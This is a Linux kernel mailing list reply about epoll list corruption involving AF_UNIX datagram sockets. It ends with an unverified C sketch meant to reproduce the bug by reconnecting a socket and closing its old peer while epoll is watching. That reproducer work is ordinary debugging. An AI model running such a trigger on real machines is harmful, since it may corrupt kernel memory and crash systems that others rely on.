Re: List corruption on epoll_ctl(EPOLL_CTL_DEL) an AF_UNIX socket

From: Rainer Weikusat
Date: Thu Oct 01 2015 - 06:35:20 EST


Jason Baron <jbaron@xxxxxxxxxx> writes:
> On 09/30/2015 01:54 AM, Mathias Krause wrote:
>> On 29 September 2015 at 21:09, Jason Baron <jbaron@xxxxxxxxxx> wrote:
>>> However, if we call connect on socket 's', to connect to a new socket 'o2', we
>>> drop the reference on the original socket 'o'. Thus, we can now close socket
>>> 'o' without unregistering from epoll. Then, when we either close the ep
>>> or unregister 'o', we end up with this list corruption. Thus, this is not a
>>> race per se, but can be triggered sequentially.
>>
>> Sounds profound, but the reproducer calls connect only once per
>> socket. So there is no "connect to a new socket", no?
>> But w/e, see below.
>
> Yes, but it can be reproduced this way too. It can also happen with a
> close() on the remote peer 'o', and a send to 'o' from 's', which the
> reproducer can do, as pointed out by Michal. The patch I sent deals with
> both cases.

As Michal also pointed out, a unix_dgram_disconnected routine is called
in both cases. If "deregistering" anything beyond what
unix_dgram_disconnected (and, as far as I can tell, unix_release_sock)
already does is actually required, that routine would be the obvious
place to add it. A good step on the way to that would be to write (and
post) some test code which actually reproduces the problem in a
predictable way.
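
For illustration only, the sequential scenario described in the quoted
text (connect 's' to 'o', register with epoll, reconnect 's' to 'o2',
close 'o', then unregister) might be sketched as below. This is a rough
sketch under assumptions, not a confirmed reproducer: the names
run_sequence and autobound_dgram are hypothetical, the use of autobound
abstract addresses and EPOLLOUT is a choice made here, and it has not
been verified to trigger the corruption on an affected kernel. The
quoted text speaks of unregistering 'o'; the sketch removes 's', the
only descriptor it registers, which is an interpretation.

```c
#include <string.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Create a datagram AF_UNIX socket and let the kernel autobind it to an
 * abstract address (Linux-specific, see unix(7)); return that address. */
static int autobound_dgram(struct sockaddr_un *addr, socklen_t *len)
{
    int fd = socket(AF_UNIX, SOCK_DGRAM, 0);

    if (fd < 0)
        return -1;
    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    *len = sizeof(*addr);
    /* addrlen == sizeof(sa_family_t) requests autobind */
    if (bind(fd, (struct sockaddr *)addr, sizeof(sa_family_t)) < 0 ||
        getsockname(fd, (struct sockaddr *)addr, len) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Walk through the sequence once. Returns 0 if every call succeeded,
 * -1 otherwise. On an affected kernel this may corrupt kernel memory,
 * so it should only be run in a disposable test machine. */
int run_sequence(void)
{
    struct sockaddr_un o_addr, o2_addr;
    socklen_t o_len, o2_len;
    struct epoll_event ev;
    int rc = -1;
    int o = autobound_dgram(&o_addr, &o_len);
    int o2 = autobound_dgram(&o2_addr, &o2_len);
    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
    int ep = epoll_create1(0);

    if (o < 0 || o2 < 0 || s < 0 || ep < 0)
        goto out;

    memset(&ev, 0, sizeof(ev));
    ev.events = EPOLLOUT;
    ev.data.fd = s;

    /* 's' is connected to 'o'; 'o' is not connected back to 's' */
    if (connect(s, (struct sockaddr *)&o_addr, o_len) < 0)
        goto out;
    /* polling 's' for writability involves its peer 'o' */
    if (epoll_ctl(ep, EPOLL_CTL_ADD, s, &ev) < 0)
        goto out;
    /* reconnect 's' to 'o2', dropping the reference on 'o' */
    if (connect(s, (struct sockaddr *)&o2_addr, o2_len) < 0)
        goto out;
    /* close 'o' while 's' is still registered with epoll */
    close(o);
    o = -1;
    /* unregister; closing 'ep' below is the other path mentioned */
    if (epoll_ctl(ep, EPOLL_CTL_DEL, s, NULL) < 0)
        goto out;
    rc = 0;
out:
    if (ep >= 0)
        close(ep);
    if (s >= 0)
        close(s);
    if (o2 >= 0)
        close(o2);
    if (o >= 0)
        close(o);
    return rc;
}
```

Calling run_sequence() from a small main() and checking for a return
value of 0 only shows that the system calls succeeded; any list
corruption would have to be observed in the kernel log.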